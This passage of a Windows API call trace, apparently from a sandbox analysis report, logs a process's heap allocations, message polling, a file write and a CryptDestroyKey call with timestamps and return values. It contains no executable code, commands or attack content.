hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa580) returned 0x2f3d630 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0157.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa580) returned 0x2e80330 [0157.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d630 | out: hHeap=0x970000) returned 1 [0157.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0157.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0157.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0157.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0157.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0157.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0157.238] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0157.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0157.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0157.239] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0157.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0157.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0157.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0157.239] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0157.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0157.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0157.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0157.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0157.240] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0157.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0157.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0157.241] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0157.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0157.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0157.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0157.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0157.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa580) returned 0x2f3d630 [0157.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0157.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0157.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0157.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d630 | out: hHeap=0x970000) returned 1 [0157.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0157.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0157.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.262] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0xa580, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0xa580, lpOverlapped=0x0) returned 1 [0157.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.265] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0157.265] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.265] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0157.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0157.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e507d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0157.266] CryptDestroyKey (hKey=0xa87610) returned 1 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0157.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0157.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0157.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0157.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0157.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0157.268] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0157.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.269] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0157.269] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0157.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0157.269] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0157.269] RtlAllocateHeap 